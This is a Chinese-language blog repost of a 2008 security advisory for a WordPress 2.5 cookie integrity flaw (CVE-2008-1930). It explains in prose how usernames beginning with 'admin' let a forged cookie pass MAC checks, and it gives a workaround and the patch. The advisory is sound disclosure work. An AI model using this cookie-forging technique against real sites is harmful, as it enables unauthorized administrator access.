WordPress Cookie完整性保护非授权访问漏洞

Posted by ArtHack on May 2nd, 2008 and filed under Notice loopholes. You can follow any responses to this entry through the RSS 2.0. You can also subscribe to us, through the Top of the E-mail - 加入超级QQ群:32843311

受影响系统:
WordPress 2.5
不受影响系统:
WordPress 2.5.1
描述:
——————————————————————————–
BUGTRAQ ID: 28935
CVE(CAN) ID: CVE-2008-1930

WordPress是一款免费的论坛Blog系统。

从2.5版本开始Wordpress使用加密保护的cookie认证登录用户。新的cookie形式为:

“wordpress_”.COOKIEHASH = USERNAME . “|” . EXPIRY_TIME . “|” . MAC

MAC是由USERNAME和EXPIRY_TIME所生成的密钥计算得出的。由于USERNAME和EXPIRY_TIME在MAC计算中没有分隔开,因此如果USERNAME和EXPIRY_TIME连接后没有变化的话,攻击者就可以未经改变MAC便修改cookie。

成功利用这个漏洞的攻击者可能以admin开始的用户名创建帐号,然后控制登录这个帐号所返回的cookie,导致获得管理帐号的控制。

<*来源:Steven J. Murdoch (http://www.cl.cam.ac.uk/users/sjm217/

链接:http://marc.info/?l=bugtraq&m=119550270403703&w=2
http://marc.info/?l=bugtraq&m=120922721931109&w=2
http://secunia.com/advisories/29965/
*>

建议:
——————————————————————————–
临时解决方法:

* 在通用设置的Membership部分清除选择Anyone can register以禁止创建帐号。

厂商补丁:

WordPress
———
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://wordpress.org/latest.zip

Classic Posts

Related Posts

Our Sponsors

Leave a Reply

Our Sponsors

Recent Posts

Recent Comments

Tag Cloud

Premium Wordpress Themes

WPZOOM
Gabfire Themes
StudioPress
StyleWP
Solostream
Translator
Chinese (Simplified) flagChinese (Traditional) flagItalian flagKorean flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroat flagDanish flagFinnish flagHindi flagPolish flagRumanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag
Log in / Art Hack.All rights reserved.